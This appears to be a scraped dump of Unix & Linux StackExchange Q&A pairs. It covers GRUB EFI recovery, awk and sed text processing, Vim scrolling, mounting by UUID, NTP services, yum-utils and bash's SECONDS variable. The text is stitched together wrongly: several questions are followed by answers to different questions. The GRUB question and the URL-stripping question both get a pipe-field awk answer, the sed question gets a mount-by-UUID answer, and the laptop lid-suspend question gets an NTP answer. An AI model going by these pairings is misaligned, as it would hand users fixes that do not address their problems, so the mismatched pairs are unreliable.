I rebooted my supermicro server and it failed to boot my linux disk. Within the BIOS/EFI I can navigate to the one operating system disk and see the EFI partition and of all the .efi files listed but there is no grubx64.efi . Which I believe is what you select, if you were to manually add your own boot option or if you were to manually boot from the EFI shell such as fs0:\EFI\EFI\redhat\grubx64.efi but I am missing this file. How does one fix this? This is on RHEL 7.6
I wouldn't use the shell itself for this. Another awk implementation $ awk 'BEGIN{OFS=FS="|"} {split($NF,a,","); for(i in a) {$NF = a[i]; print}}' data ABC|RAM|BANGALORE|100 ABC|RAM|BANGALORE|200 ABC|RAM|BANGALORE|300 or with Miller $ mlr --nidx --fs '|' nest --explode --values --across-records --nested-fs ',' -f 4 data ABC|RAM|BANGALORE|100 ABC|RAM|BANGALORE|200 ABC|RAM|BANGALORE|300 or more compactly mlr --nidx --fs '|' nest --evar ',' -f 4 data If you really need to use a shell, then with a suitably recent bash: #!/bin/bashwhile IFS='|' read -a fields; do IFS=',' read -a vals <<<"${fields[ -1]}" unset 'fields[ -1]' for v in "${vals[@]}"; do printf '%s|' "${fields[@]}" printf '%s\n' "$v" done done < data
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585008", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/154426/" ] }
585,013
I have the below data (Actual output) http://localhost:5058/uaa/token,80https://t-mobile.com,443http://USERSECURITYTOKEN/payments/security/jwttoken,80https://core.op.api.internal.t-mobile.com/v1/oauth2/accesstoken?grant_type,443http://AUTOPAYV3/payments/v3/autopay/search,80http://AUTOPAYV3/payments/v3/autopay,80http://CARDTYPEVALIDATION/payments/v4/internal/card-type-validation/getBinDetails,80 I am trying to get below data (Expected output) localhost:5058/uaa/token,80t-mobile.com,443USERSECURITYTOKEN/payments/security/jwttoken,80core.op.api.internal.t-mobile.com/v1/oauth2/accesstoken?grant_type,443AUTOPAYV3/payments/v3/autopay/search,80AUTOPAYV3/payments/v3/autopay,80CARDTYPEVALIDATION/payments/v4/internal/card-type-validation/getBinDetails,80 and would like to combine working command with the below script #!/bin/bashfor file in $(ls); do #echo " --$file -- "; grep -P '((?<=[^0-9.]|^)[1-9][0-9]{0,2}(\.([0-9]{0,3})){3}(?=[^0-9.]|$)|(http|ftp|https|ftps|sftp)://([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:/+#-]*[\w@?^=%&/+#-])?|\.port|\.host|contact-points|\.uri|\.endpoint)' $file|grep '^[^#]' |awk '{split($0,a,"#"); print a[1]}'|awk '{split($0,a,"="); print a[1],a[2]}'|sed 's/^\|#/,/g'|awk '/http:\/\// {print $2,80} /https:\/\// {print $2,443} /Points/ {print $2,"9042"} /host/ {h=$2} /port/ {print h,$2; h=""}'|awk -F'[, ]' '{for(i=1;i<NF;i++){print $i,$NF}}'|awk 'BEGIN{OFS=","} {$1=$1} 1'|sed '/^[0-9]*$/d'|awk -F, '$1 != $2' done |awk '!a[$0]++' #echo "Done."stty echocd .. Need the solution ASAP, thank you in advance
I wouldn't use the shell itself for this. Another awk implementation $ awk 'BEGIN{OFS=FS="|"} {split($NF,a,","); for(i in a) {$NF = a[i]; print}}' data ABC|RAM|BANGALORE|100 ABC|RAM|BANGALORE|200 ABC|RAM|BANGALORE|300 or with Miller $ mlr --nidx --fs '|' nest --explode --values --across-records --nested-fs ',' -f 4 data ABC|RAM|BANGALORE|100 ABC|RAM|BANGALORE|200 ABC|RAM|BANGALORE|300 or more compactly mlr --nidx --fs '|' nest --evar ',' -f 4 data If you really need to use a shell, then with a suitably recent bash: #!/bin/bashwhile IFS='|' read -a fields; do IFS=',' read -a vals <<<"${fields[ -1]}" unset 'fields[ -1]' for v in "${vals[@]}"; do printf '%s|' "${fields[@]}" printf '%s\n' "$v" done done < data
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585013", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/397847/" ] }
585,019
If I press zz in vim, my screen/view will center vertically on the cursor position. How can I do the same, but horizontally? Is there a vim command for that?
There's no single Vim command, but you can combine zs with zH : Scroll to position the cursor at the left side of the screen, then scroll half a screenwidth to the right. I have this mapping in my ~/.vimrc : " Horizontally center cursor position." Does not move the cursor itself (except for 'sidescrolloff' at the window" border).nnoremap <silent> z. :<C-u>normal! zszH<CR>
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585019", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411015/" ] }
585,087
I have some millions of files that have been saved with 'corrupted' name. The extension has been saved as _pdf . What i want is, recursively, edit all those extensions to use dot as expected. find . -name '*_pdf' -type f -exec bash -c 'mv -- "$1" "${1//_/.}"' -- {} \; I have already tried with this bash script but it replaces all '_' founded with '.', i want just the last _ and if proceeded by common extensions (pdf, jpg, jpeg).
It's replacing all instances of _ because ${1//_/.} is global ( ${1/_/.} would be non-global, but replace the first match rather than the last). Instead you could use POSIX ${1%_*} and ${1##*_} to remove the shortest suffix and longest prefix, then rejoin them: find . -name '*_pdf' -type f -exec sh -c 'mv "$1" "${1%_*}.${1##*_}"' sh {} \; or find . -name '*_pdf' -type f -exec sh -c 'for f do mv "$f" "${f%_*}.${f##*_}"; done' sh {} + For multiple extensions: find . \( -name '*_pdf' -o -name '*_jpg' -o -name '*_jpeg' \) -type f -exec sh -c ' for f do mv "$f" "${f%_*}.${f##*_}"; done' sh {} + I removed the -- end-of-options delimiter - it shouldn't be necessary here since find prefixes the names with ./ . You may want to add a -i option to mv if there's risk that both a file_pdf and file.pdf exist in a given directory and you want to be given a chance not to clobber the exising file.pdf .
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/585087", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/298405/" ] }
585,107
After fresh installing Debian buster OS andPackage: command-not-found running command: $ curlCould not find the database of available applications, run update-command-not-found as root to fix thisSorry, command-not-found has crashed! Please file a bug report at:http://www.debian.org/Bugs/ReportingPlease include the following information with the report:command-not-found version: 0.3Python version: 3.7.3 final 0Distributor ID: DebianDescription: Debian GNU/Linux 10 (buster)Release: 10Codename: busterException information:local variable 'cnf' referenced before assignmentTraceback (most recent call last): File "/usr/share/command-not-found/CommandNotFound/util.py", line 23, in crash_guard callback() File "/usr/lib/command-not-found", line 93, in main if not cnf.advise(args[0], options.ignore_installed) and not options.no_failure_msg:UnboundLocalError: local variable 'cnf' referenced before assignment Issuing update-command-not-found as root does not fix the problem.There is bug report, but seems no fix yet.
Not intuitive, but error goes away immediately after apt update : # apt updateHit:1 http://deb.debian.org/debian buster InReleaseGet:2 http://deb.debian.org/debian buster-updates InRelease [49.3 kB]Hit:3 http://security.debian.org/debian-security buster/updates InReleaseGet:4 http://deb.debian.org/debian buster/main amd64 Contents (deb) [36.1 MB]Get:5 http://deb.debian.org/debian buster-updates/main amd64 Contents (deb) [42.3 kB]Fetched 36.2 MB in 7s (5,009 kB/s) Reading package lists... DoneBuilding dependency tree Reading state information... DoneAll packages are up to date.# curlCommand 'curl' not found, but can be installed with:apt install curl PS. For those curious, the reason for that is missing db upon fresh install: ls -l /var/lib/command-not-foundtotal 0 and after apt update we have: ls -l /var/lib/command-not-foundtotal 2504-rw-r--r-- 1 root root 2560000 Jul 29 12:34 commands.db-rw-r--r-- 1 root root 983 Jul 29 12:34 commands.db.metadata
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585107", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/100512/" ] }
585,162
Is it possible to use UUIDs to mount drives, rather than using these values in fstab? I have a script which mounts devices, however there is no way to guarantee that the drive labels such as /dev/sda2 will always be the same. I'm aware I can mount the drive at boot time using this method with fstab , however in the case of external disks, they may not always be present at boot time.
Yes it's possible, you just use the UUID option: lsblk -o NAME,UUIDNAME UUIDsdc ├─sdc1 A190-92D5└─sdc2 A198-A7BCsudo mount -U A198-A7BC /mnt Or sudo mount UUID=A198-A7BC /mnt Or sudo mount --uuid A198-A7BC /mnt The mount --help : Source: -L, --label synonym for LABEL= -U, --uuid synonym for UUID= LABEL= specifies device by filesystem label UUID= specifies device by filesystem UUID PARTLABEL= specifies device by partition label PARTUUID= specifies device by partition UUID specifies device by path mountpoint for bind mounts (see --bind/rbind) regular file for loopdev setup
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/585162", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/32864/" ] }
585,170
I want to add one blank space after any occurrence of: <span class="negrita">ANYTHING</span> So, with this SED instruction: sed -E "s/(<span class=\"negrita\">.*?<\/span>)/\1 /g" <<< 'In <span class="negrita">1959</span> economic policy was reoriented in order to undertake <span class="negrita">the country modernization</span>. More text' I get this output: In <span class="negrita">1959</span> economic policy was reoriented in order to undertake <span class="negrita">the country modernization</span> . More text So, as you can see, it is adding the blank space after the last occurrence, but not after the first one. Isn't the "/g" option meant to indicate that it should replace all occurrences? Thanks in advance.
Yes it's possible, you just use the UUID option: lsblk -o NAME,UUIDNAME UUIDsdc ├─sdc1 A190-92D5└─sdc2 A198-A7BCsudo mount -U A198-A7BC /mnt Or sudo mount UUID=A198-A7BC /mnt Or sudo mount --uuid A198-A7BC /mnt The mount --help : Source: -L, --label synonym for LABEL= -U, --uuid synonym for UUID= LABEL= specifies device by filesystem label UUID= specifies device by filesystem UUID PARTLABEL= specifies device by partition label PARTUUID= specifies device by partition UUID specifies device by path mountpoint for bind mounts (see --bind/rbind) regular file for loopdev setup
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/585170", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411171/" ] }
585,212
While watching top some process flashed before my eyes with strange USER -column debian-+ . I checked that this particular process belongs to /usr/bin/tor . But I can't see the user debian-+ in Linux files like e.g. /etc/passwd . There is only debian-tor user there. So what is the need for user debian-+ ? Is it only related to tor or something else?
It’s the debian-tor user, but top truncates it to debian-+ (the + indicates that the value was truncated). The default width for the USER column is 8 characters, and the column doesn’t scale with its contents. The width can be adjusted with X while top is running.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/585212", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/165555/" ] }
585,233
If you see these are my two partitions 1 and 2 Now if we look at the partition level sda2 is total of 149.5G ie root, swap, home of 50, 3.8, 25.7G each but that still not adds upto total size of the partition. So my question is where is that 149.5 - (50 + 3.8 + 25.7) i.e the 70G how can I retrieve this space and use it? EDIT 1 : vgs EDIT 2 : pvs EDIT 3 : Ran pvresize /dev/sda2 which gave pvs and vgs as EDIT 4 : Ran lvresize -l +100%FREE /dev/vg_relcertlin2/lv_root but df -hT and lsblk are showing different output
It’s the debian-tor user, but top truncates it to debian-+ (the + indicates that the value was truncated). The default width for the USER column is 8 characters, and the column doesn’t scale with its contents. The width can be adjusted with X while top is running.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/585233", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/354177/" ] }
585,247
Is there anyway to use uniq (or similar) to filter/remove sets of repeating lines from log type output? I am debugging an MPI code where multiple processors often print the same exact output. uniq works great when the output is one line, but frequently the code will generate multiple lines. Here's an example: calling config()calling config()calling config()running main loop time=0running main loop time=0running main loop time=0output from Rank 0 gets filtered with uniq (without options) to: calling config()running main loop time=0running main loop time=0running main loop time=0output from Rank 0 is there an easy way to filter n-line blocks? I've read and reread the manpage but can't find anything obvious. Thanks! UPDATE : I'd like the output to have duplicated blocks condensed down to a single entry, so in the case of the example above: calling config()running main loop time=0output from Rank 0
$ awk '!a[$0]++' filecalling config()running main loop time=0output from Rank 0
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585247", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411248/" ] }
585,248
We know that the cd command is used to change directories. For example cd dirname valid dirnames include . and .. as well. The purpose of cd .. is clear. From the manpage: A null directory name in CDPATH is the same as the current directory, i.e., ''.''. But then what is the purpose of cd . ?
The effect of cd . is to update the shell with information about what the current working directory is. This could be useful in circumstances when the (pathname of the) current directory changes by other means than through cd . $ pwd/tmp/shell-bash.OoVntBAM$ mkdir dir$ cd dir$ pwd/tmp/shell-bash.OoVntBAM/dir So, we're currently some place under /tmp , in a directory called dir . Let's rename the directory we're currently in. $ mv ../dir ../new-dir So, where are we now? $ pwd/tmp/shell-bash.OoVntBAM/dir Really? Why, that's odd. Let's make sure the shell knows were we are. $ cd .$ pwd/tmp/shell-bash.OoVntBAM/new-dir In a script, cd . could possibly be used to test whether the user still as access to the current directory: if ! cd . 2>/dev/null; then echo lost access to cwd >&2 exit 1fi Or, the other way around, to verify that the current directory is no longer accessible after some sort of operation to revoke access for the current user. Reasons for loosing access to the current directory includes having the directory removed, or someone removing one's execute permissions on it. Another example is using cd . , but with the -P option, i.e. cd -P . . This would put you in the "physical" directory if the current directory was otherwise accessed through a symbolic link: $ pwd/tmp/shell-bash.OoVntBAM$ mkdir dir$ ln -s dir link-dir$ ls -ltotal 2drwxr-xr-x 3 kk wheel 512 May 8 00:48 dirlrwxr-xr-x 1 kk wheel 3 May 8 00:46 link-dir -> dir So now we have a directory, dir , and a symbolic link to that directory. Let's enter the directory through the symbolic link: $ cd link-dir$ pwd/tmp/shell-bash.OoVntBAM/link-dir Then... $ cd -P .$ pwd/tmp/shell-bash.OoVntBAM/dir
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585248", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/294996/" ] }
585,275
I'm running CentOS 7. I want to install gcc (for the purposes of building Python 3 with the new openssl package I installed). I was reading here -- https://stackoverflow.com/questions/19816275/no-acceptable-c-compiler-found-in-path-when-installing-python , that installing "Development Tools" was the truth and the light. But I don't seem to be able to ... (venv) [rails@server Python-3.7.0]$ sudo yum groupinstall "Development Tools"[sudo] password for rails: Loaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: mirror.mi.incx.net * epel: mirror.us-midwest-1.nexcess.net * extras: mirror.cs.pitt.edu * updates: mirror.pit.teraswitch.comMaybe run: yum groups mark install (see man yum)No packages in any requested group available to install or update Here's some extra info about my system if needed (venv) [rails@server Python-3.7.0]$ uname -aLinux server 2.6.32-042stab120.19 #1 SMP Mon Feb 20 20:05:53 MSK 2017 x86_64 x86_64 x86_64 GNU/Linux Edit: Adding results as suggested by answer ... [rails@server ~]$ sudo yum groups mark install "Development Tools"[sudo] password for rails: Loaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: ftp.ussg.iu.edu * epel: mirror.us-midwest-1.nexcess.net * extras: mirror.cs.uwp.edu * updates: mirror.pit.teraswitch.comMarked install: Development Tools[rails@server ~]$ sudo yum groups mark convert "Development Tools"Loaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: ftp.ussg.iu.edu * epel: mirror.us-midwest-1.nexcess.net * extras: mirror.cs.uwp.edu * updates: mirror.pit.teraswitch.comConverted old style groups to objects.[rails@server ~]$ sudo yum groupinstall "Development Tools"Loaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: ftp.ussg.iu.edu * epel: mirror.us-midwest-1.nexcess.net * extras: mirror.cs.uwp.edu * updates: mirror.pit.teraswitch.comMaybe run: yum groups mark install (see man yum)No packages in any requested group available to install or update Edit 2 More output in response to comments from answers ... [rails@server ~]$ sudo yum groupinstall "Development Tools" --setopt=group_package_types=mandatory,default,optionalLoaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: mirror.vcu.edu * epel: mirror.us-midwest-1.nexcess.net * extras: ftp.osuosl.org * updates: mirror.mi.incx.netMaybe run: yum groups mark install (see man yum)No packages in any requested group available to install or update and this ... [rails@server ~]$ sudo yum grouplistLoaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: mirror.vcu.edu * epel: mirror.us-midwest-1.nexcess.net * extras: repo1.ash.innoscale.net * updates: mirror.mi.incx.netAvailable Environment Groups: Minimal Install Compute Node Infrastructure Server File and Print Server Cinnamon Desktop MATE Desktop Basic Web Server Virtualization Host Server with GUI GNOME Desktop KDE Plasma Workspaces Development and Creative WorkstationInstalled Groups: Console Internet Tools Development Tools Electronic Lab Legacy UNIX Compatibility Milkymist PostgreSQL Database Server 9.6 PGDG Security Tools System Administration ToolsAvailable Groups: Cinnamon Compatibility Libraries Educational Software Fedora Packager General Purpose Desktop Graphical Administration Tools Haskell LXQt Desktop MATE PostgreSQL Database Server 10 PGDG PostgreSQL Database Server 11 PGDG PostgreSQL Database Server 12 PGDG PostgreSQL Database Server 9.5 PGDG Scientific Support Smart Card Support System Management TurboGears application framework XfceDone Edit 3: Output per second suggestion (repolist) ... [rails@server ~]$ sudo yum repolist allLoaded plugins: fastestmirrorLoading mirror speeds from cached hostfile * base: mirror.trouble-free.net * epel: mirror.us-midwest-1.nexcess.net * extras: mirror.pit.teraswitch.com * updates: mirrors.gigenet.comrepo id repo name statusC7.0.1406-base/x86_64 CentOS-7.0.1406 - Base disabledC7.0.1406-centosplus/x86_64 CentOS-7.0.1406 - CentOSPlus disabledC7.0.1406-extras/x86_64 CentOS-7.0.1406 - Extras disabledC7.0.1406-fasttrack/x86_64 CentOS-7.0.1406 - Fasttrack disabledC7.0.1406-updates/x86_64 CentOS-7.0.1406 - Updates disabledC7.1.1503-base/x86_64 CentOS-7.1.1503 - Base disabledC7.1.1503-centosplus/x86_64 CentOS-7.1.1503 - CentOSPlus disabledC7.1.1503-extras/x86_64 CentOS-7.1.1503 - Extras disabledC7.1.1503-fasttrack/x86_64 CentOS-7.1.1503 - Fasttrack disabledC7.1.1503-updates/x86_64 CentOS-7.1.1503 - Updates disabledC7.2.1511-base/x86_64 CentOS-7.2.1511 - Base disabledC7.2.1511-centosplus/x86_64 CentOS-7.2.1511 - CentOSPlus disabledC7.2.1511-extras/x86_64 CentOS-7.2.1511 - Extras disabledC7.2.1511-fasttrack/x86_64 CentOS-7.2.1511 - Fasttrack disabledC7.2.1511-updates/x86_64 CentOS-7.2.1511 - Updates disabledC7.3.1611-base/x86_64 CentOS-7.3.1611 - Base disabledC7.3.1611-centosplus/x86_64 CentOS-7.3.1611 - CentOSPlus disabledC7.3.1611-extras/x86_64 CentOS-7.3.1611 - Extras disabledC7.3.1611-fasttrack/x86_64 CentOS-7.3.1611 - Fasttrack disabledC7.3.1611-updates/x86_64 CentOS-7.3.1611 - Updates disabledC7.4.1708-base/x86_64 CentOS-7.4.1708 - Base disabledC7.4.1708-centosplus/x86_64 CentOS-7.4.1708 - CentOSPlus disabledC7.4.1708-extras/x86_64 CentOS-7.4.1708 - Extras disabledC7.4.1708-fasttrack/x86_64 CentOS-7.4.1708 - Fasttrack disabledC7.4.1708-updates/x86_64 CentOS-7.4.1708 - Updates disabledC7.5.1804-base/x86_64 CentOS-7.5.1804 - Base disabledC7.5.1804-centosplus/x86_64 CentOS-7.5.1804 - CentOSPlus disabledC7.5.1804-extras/x86_64 CentOS-7.5.1804 - Extras disabledC7.5.1804-fasttrack/x86_64 CentOS-7.5.1804 - Fasttrack disabledC7.5.1804-updates/x86_64 CentOS-7.5.1804 - Updates disabledC7.6.1810-base/x86_64 CentOS-7.6.1810 - Base disabledC7.6.1810-centosplus/x86_64 CentOS-7.6.1810 - CentOSPlus disabledC7.6.1810-extras/x86_64 CentOS-7.6.1810 - Extras disabledC7.6.1810-fasttrack/x86_64 CentOS-7.6.1810 - Fasttrack disabledC7.6.1810-updates/x86_64 CentOS-7.6.1810 - Updates disabledC7.7.1908-base/x86_64 CentOS-7.7.1908 - Base disabledC7.7.1908-centosplus/x86_64 CentOS-7.7.1908 - CentOSPlus disabledC7.7.1908-extras/x86_64 CentOS-7.7.1908 - Extras disabledC7.7.1908-fasttrack/x86_64 CentOS-7.7.1908 - Fasttrack disabledC7.7.1908-updates/x86_64 CentOS-7.7.1908 - Updates disabledbase/7/x86_64 CentOS-7 - Base enabled: 10,070base-debuginfo/x86_64 CentOS-7 - Debuginfo disabledbase-source/7 CentOS-7 - Base Sources disabledc7-media CentOS-7 - Media disabledcentos-kernel/7/x86_64 CentOS LTS Kernels for x86_64 disabledcentos-kernel-experimental/7/x86_64 CentOS Experimental Kernels for x86_64 disabledcentosplus/7/x86_64 CentOS-7 - Plus disabledcentosplus-source/7 CentOS-7 - Plus Sources disabledcr/7/x86_64 CentOS-7 - cr disabledepel/x86_64 Extra Packages for Enterprise Linux 7 - x86_64 enabled: 13,266epel-debuginfo/x86_64 Extra Packages for Enterprise Linux 7 - x86_64 - Debug disabledepel-source/x86_64 Extra Packages for Enterprise Linux 7 - x86_64 - Source disabledepel-testing/x86_64 Extra Packages for Enterprise Linux 7 - Testing - x86_64 disabledepel-testing-debuginfo/x86_64 Extra Packages for Enterprise Linux 7 - Testing - x86_64 - Debug disabledepel-testing-source/x86_64 Extra Packages for Enterprise Linux 7 - Testing - x86_64 - Source disabledextras/7/x86_64 CentOS-7 - Extras enabled: 392extras-source/7 CentOS-7 - Extras Sources disabledfasttrack/7/x86_64 CentOS-7 - fasttrack disabledgoogle-chrome google-chrome enabled: 3pgdg-common/7/x86_64 PostgreSQL common RPMs for RHEL/CentOS 7 - x86_64 enabled: 288pgdg-common-srpm-testing/7/x86_64 PostgreSQL common testing SRPMs for RHEL/CentOS 7 - x86_64 disabledpgdg-common-testing/7/x86_64 PostgreSQL common testing RPMs for RHEL/CentOS 7 - x86_64 disabledpgdg-source-common/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg10/7/x86_64 PostgreSQL 10 for RHEL/CentOS 7 - x86_64 enabled: 626pgdg10-source/7/x86_64 PostgreSQL 10 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg10-updates-debuginfo/7/x86_64 PostgreSQL 10 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg11/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 enabled: 623pgdg11-source/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg11-source-updates-testing/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 - Source update testing disabledpgdg11-updates-debuginfo/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg11-updates-testing/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 - Updates testing disabledpgdg11-updates-testing-debuginfo/7/x86_64 PostgreSQL 11 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg12/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 enabled: 317pgdg12-source/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg12-source-updates-testing/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Source update testing disabledpgdg12-updates-debuginfo/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg12-updates-testing/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Updates testing disabledpgdg12-updates-testing-debuginfo/7/x86_64 PostgreSQL 12 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg13-source-updates-testing/7/x86_64 PostgreSQL 13 for RHEL/CentOS 7 - x86_64 - Source updates testing disabledpgdg13-updates-debuginfo/7/x86_64 PostgreSQL 13 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg13-updates-testing/7/x86_64 PostgreSQL 13 for RHEL/CentOS 7 - x86_64 - Updates testing disabledpgdg13-updates-testing-debuginfo/7/x86_64 PostgreSQL 13 for RHEL/CentOS 7 - x86_64 - Debuginfo disabled!pgdg94/7/x86_64 PostgreSQL 9.4 for RHEL/CentOS 7 - x86_64 disabledpgdg94-source/7/x86_64 PostgreSQL 9.4 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg95/7/x86_64 PostgreSQL 9.5 for RHEL/CentOS 7 - x86_64 enabled: 572pgdg95-source/7/x86_64 PostgreSQL 9.5 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg95-updates-debuginfo/7/x86_64 PostgreSQL 9.5 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledpgdg96/7/x86_64 PostgreSQL 9.6 for RHEL/CentOS 7 - x86_64 enabled: 603pgdg96-source/7/x86_64 PostgreSQL 9.6 for RHEL/CentOS 7 - x86_64 - Source disabledpgdg96-updates-debuginfo/7/x86_64 PostgreSQL 9.6 for RHEL/CentOS 7 - x86_64 - Debuginfo disabledupdates/7/x86_64 CentOS-7 - Updates enabled: 245updates-source/7 CentOS-7 - Updates Sources disabled
In your console output it says: Maybe run: yum groups mark install (see man yum) —did you do this? Try running the following commands: yum groups mark install "Development Tools"yum groups mark convert "Development Tools"yum groupinstall "Development Tools" Reference: RedHat Customer Portal discussion
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585275", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/166917/" ] }
585,519
Is there any issue with running systemd-timesyncd and ntp on the same machine? I'm asking this because I have started using NTP on all servers but the systemd-timesyncd is running there as well. Should I disable it? Any issues with both running?
Running both at the same time is not recommended. Both services might be using difference ntp servers with slight difference in time. So your server will experience time corrections very frequently: time synced by ntp service will get changed by systemd-timesyncd, and vice-verse. You may already know, you can disable systemd-timesyncd start on boot and also stop the running service simultaneously using: systemctl disable systemd-timesyncd --now
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585519", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/185233/" ] }
585,531
I want my laptop to stay running when it is on A/C-power even when it is idle and the lid is closed. I managed to make it not suspend immediately when the lid is closed with: /etc/systemd/logind.conf:[Login]HandleLidSwitch=ignoreHandleLidSwitchExternalPower=ignoreHandleLidSwitchDocked=ignoreIdleAction=ignoreIdleActionSec=1min But around 1200 seconds after rebooting (no login on gdm ) it suspends to RAM. What am I missing? $ uname -aLinux nlv 5.4.0-29-generic #33-Ubuntu SMP Wed Apr 29 14:32:27 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux$ cat /etc/issueUbuntu 20.04 LTS \n \l$ cat /etc/systemd/sleep.conf (# comments removed for brevity)[Sleep]
Running both at the same time is not recommended. Both services might be using difference ntp servers with slight difference in time. So your server will experience time corrections very frequently: time synced by ntp service will get changed by systemd-timesyncd, and vice-verse. You may already know, you can disable systemd-timesyncd start on boot and also stop the running service simultaneously using: systemctl disable systemd-timesyncd --now
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585531", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/2972/" ] }
585,579
After installing microk8s (Micro Kubernetes) on my local machine, one of the commands I encountered was microk8s.enable dns which can also be run as microk8s enable dns . This doesn't seem to be a universal thing. git status is a valid command but git.status is not. How do Linux systems support such type of command structures? How can I incorporate this behavior in my Bash scripts?
You'll sometimes see programs (and scripts) inspect the name of the file that was used to invoke the program and condition behavior off of that. Consider for example this file and symbol link: $ ls -l-rwxr-xr-x ... foolrwxr-xr-x ... foo.bar -> foo And the content of the script foo : #!/bin/bashreadonly command="$(basename "${0}")"subcommand="$(echo "${command}" | cut -s -d. -f2)"if [[ "${subcommand}" == "" ]]; then subcommand="${1}"fiif [[ "${subcommand}" == "" ]]; then echo "Error: subcommand not specified" 1>&2 exit 1fiecho "Running ${subcommand}" The script parses the command name looking for a subcommand (based on the dot notation in your question). With that, I can run ./foo.bar and get the same behavior as running ./foo bar : $ ./foo.barRunning bar$ ./foo barRunning bar To be clear, I don't know that that's what microk8s.enable is doing. You could do a ls -li $(which microk8s.enable) $(which microk8s) and compare the files. Is one a link to the other? If not, do they have the same inode number?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585579", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/411571/" ] }
585,585
we are using rhel 7.6 version we are very surprised that yum-config-manager isnt installed on rhel 7.6 by default so we download the ISO file of rhel 7.6 , and mount all pkgs from rhel 7.6 to /mnt and create the repo for rhel 7.6 so now we try to install the yum-config-manager but: yum install yum-config-managerLoaded plugins: langpacksconfigurationNo package yum-config-manager available.Error: Nothing to do so I not understand why this pkg/rpm isn't part of the ISO? update , we did also yum provides */yum-config-managerLoaded plugins: langpacksconfigurationInstallMedia/filelists_db | 3.4 MB 00:00:00yum-utils-1.1.31-50.el7.noarch : Utilities based around the yum package managerRepo : InstallMediaMatched from:Filename : /usr/bin/yum-config-manageryum-utils-1.1.31-50.el7.noarch : Utilities based around the yum package managerRepo : @InstallMediaMatched from:Filename : /usr/bin/yum-config-manager
The yum-config-manager program is not a standalone package. It is part of yum-utils package, thus: yum install yum-utils
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/585585", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/237298/" ] }
585,646
I am new to bash scripting and started out with a few sample scripts. One is: #!/bin/bashSECONDS=5i=1while truedo echo "`date`: Loop $i" i=$(( $i+1 )) sleep $SECONDSdone This results in: Sunday 10 May 15:08:20 AEST 2020: Loop 1Sunday 10 May 15:08:25 AEST 2020: Loop 2Sunday 10 May 15:08:35 AEST 2020: Loop 3Sunday 10 May 15:08:55 AEST 2020: Loop 4 ... and is not what I expected or wanted the script to do. Why would the seconds double, every time it runs through the loop bash --versionGNU bash, version 4.3.48(1)-release (x86_64-pc-linux-gnu)Copyright (C) 2013 Free Software Foundation, Inc.License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
Because SECONDS is an internal variable in bash. It stores the amount of time that the shell has been running. From man bash : SECONDS Each time this parameter is referenced, the number of seconds since shell invocation is returned. If a value is assigned to SECONDS, the value returned upon subsequent references is the number of seconds since the assignment plus the value assigned. So, your script works like this: On first use it accepts the value of 5 as input, the initial value is 5. Then there is an sleep of 5 seconds, when that sleep returns, the value of SECONDS will be the 5 seconds of the initial value + 5 seconds of the sleep = 10 seconds Then there is an sleep of 10 seconds (the present value of SECONDS) plus the previous accumulated time of 10 seconds will give 20. Repeat an sleep for 20 seconds plus the previous value of 20 is 40. etc.
